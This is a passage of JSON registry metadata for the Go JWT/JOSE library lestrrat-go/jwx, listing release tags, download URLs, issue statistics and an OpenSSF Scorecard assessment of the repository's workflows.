6.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:58.118Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.082177034635306,"dependent_packages_count":5.700411654884096,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.891294344759701},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwt/internal/types","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwt/internal/types","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwt/internal/types","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwt/internal/types/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt%2Finternal%2Ftypes/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt%2Finternal%2Ftypes/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt%2Finternal%2Ftypes/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt%2Finternal%2Ftypes/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt%2Finternal%2Ftypes/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwt%2Finternal%2Ftypes/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4260446,"name":"github.com/lestrrat-go/jwx/jwt/internal/cmd/gentoken","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/jwt/internal/cmd","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2026-01-22T08:35:55.529Z","latest_release_number":null,"last_synced_at":"2026-05-30T23:16:24.774Z","created_at":"2022-04-13T00:48:58.845Z","updated_at":"2026-05-30T23:16:24.774Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwt/internal/cmd/gentoken","install_command":"go get github.com/lestrrat-go/jwx/jwt/internal/cmd/gentoken","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwt/internal/cmd/gentoken#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go 